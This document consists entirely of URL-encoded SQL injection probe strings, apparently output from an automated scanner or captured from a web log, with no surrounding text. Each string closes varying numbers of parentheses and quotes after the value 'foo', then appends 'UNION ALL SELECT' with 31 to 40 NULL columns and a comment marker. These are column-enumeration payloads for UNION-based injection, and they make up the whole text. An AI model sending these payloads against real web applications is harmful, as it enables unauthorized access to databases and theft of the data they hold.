foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 